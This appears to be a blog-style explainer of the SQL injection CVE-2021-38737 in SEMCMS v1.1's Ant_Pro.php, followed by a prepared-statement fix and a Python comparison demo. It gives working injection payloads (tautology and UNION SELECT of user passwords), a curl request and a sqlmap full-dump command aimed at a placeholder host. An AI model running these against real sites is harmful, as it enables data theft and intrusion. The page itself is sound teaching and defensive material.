In today's connected world, website vulnerabilities can pose severe risks to organizations. One such flaw, registered as CVE-2021-38737, impacts the SEMCMS v1.1 content management system. This exclusive post explains the vulnerability, how it works, and how hackers can exploit it, including real code samples and security references.

What is CVE-2021-38737?

CVE-2021-38737 refers to a security bug discovered in the Ant_Pro.php file of SEMCMS v1.1. This bug lets an attacker manipulate the application's database through SQL Injection.

SQL Injection (SQLi) happens when an application doesn't properly clean user input, allowing attackers to run malicious SQL commands on the database. With this bug, an attacker could steal sensitive data, alter information, or even take over the website.

Where's the Problem?

The vulnerable script is Ant_Pro.php in the SEMCMS v1.1 CMS. Specifically, a user-supplied request parameter is not validated or escaped before it is concatenated into a SQL query.

Here’s an example code snippet that shows the risky part (from a public PoC, edited for clarity):

<?php
// Ant_Pro.php (simplified for demonstration; $conn is an already-open mysqli connection)
$id = $_GET['id'];                                  // raw request parameter, no validation
$sql = "SELECT * FROM products WHERE id = '$id'";   // user input spliced directly into the SQL text
// Database call using the $sql query
$result = mysqli_query($conn, $sql);

Notice how $id is used in the SQL query without any validation. This allows an attacker to inject SQL statements.

Let’s try a real-world example. Suppose the target URL is

http://victim.com/Ant_Pro.php?id=1

If an attacker changes the URL to this

http://victim.com/Ant_Pro.php?id=1' OR '1'='1

The SQL query now becomes

SELECT * FROM products WHERE id = '1' OR '1'='1'

Since '1'='1' is always true, the WHERE clause matches every row and the database returns the entire products table!

Attackers can also use UNION-based injections to pull data from other tables

http://victim.com/Ant_Pro.php?id=1' UNION SELECT username, password FROM users-- -

Tools like sqlmap can automate this process, making attacks easier and faster.

Here’s a quick sample using curl

curl "http://victim.com/Ant_Pro.php?id=1' OR '1'='1"

Or use sqlmap

sqlmap -u "http://victim.com/Ant_Pro.php?id=1" --risk=3 --level=5 --dump

Security References

- Official CVE Details - CVE-2021-38737
- Exploit Database Reference
- CVE Entry at CVE.org
- OWASP - SQL Injection Explained

Mitigation

- Use prepared statements or parameterized queries

<?php
// Secure way with prepared statements ($conn is a mysqli connection)
$id = (int) ($_GET['id'] ?? 0);                       // coerce the input before it goes anywhere near SQL
$stmt = $conn->prepare("SELECT * FROM products WHERE id = ?");
$stmt->bind_param("i", $id);                          // "i": the value is bound as an integer parameter, never as SQL text
$stmt->execute();
$result = $stmt->get_result();                        // rows come back without any string interpolation
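As an added example (not code from the original post or from SEMCMS), here are the two query styles side by side in Python, with an in-memory SQLite database standing in for the CMS's MySQL tables; the table contents are constructed, and the two payloads are the ones shown earlier on this page. The interpolated query behaves like the flawed Ant_Pro.php, the parameterized one like the fix:

```python
import sqlite3


def setup_db() -> sqlite3.Connection:
    # Constructed stand-in for the CMS database: the products table that
    # Ant_Pro.php reads, plus a users table that an injection could reach.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, name TEXT);
        INSERT INTO products VALUES (1, 'widget'), (2, 'gadget'), (3, 'gizmo');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'hash-placeholder');
    """)
    return conn


def vulnerable_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    # Mirrors the flawed Ant_Pro.php pattern: the raw parameter is spliced
    # into the SQL text, so quotes and keywords in it become part of the query.
    sql = f"SELECT * FROM products WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn: sqlite3.Connection, user_id: str) -> list:
    # Mirrors the prepared-statement fix: the value is sent as a bound
    # parameter, so the database only ever compares it against the id column.
    return conn.execute(
        "SELECT * FROM products WHERE id = ?", (user_id,)
    ).fetchall()


if __name__ == "__main__":
    db = setup_db()
    # The two payloads discussed on this page, plus a benign request.
    for payload in ("1",
                    "1' OR '1'='1",
                    "1' UNION SELECT username, password FROM users-- -"):
        print(repr(payload))
        print("  interpolated :", vulnerable_lookup(db, payload))
        print("  parameterized:", safe_lookup(db, payload))
```

The parameterized version returns exactly one product for id=1 and nothing at all for either payload, which is the whole point of the fix.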

Summary

CVE-2021-38737 in SEMCMS v1.1 is a dangerous SQL Injection flaw that could let hackers steal or change your website’s data. It affects Ant_Pro.php and can be easily exploited by just changing a URL. Always update your software, sanitize your inputs, and check the references above for further reading.

Stay safe! Always keep your software up-to-date and never trust user input.

Timeline

Published on: 10/28/2022 15:15:00 UTC
Last modified on: 10/28/2022 18:34:00 UTC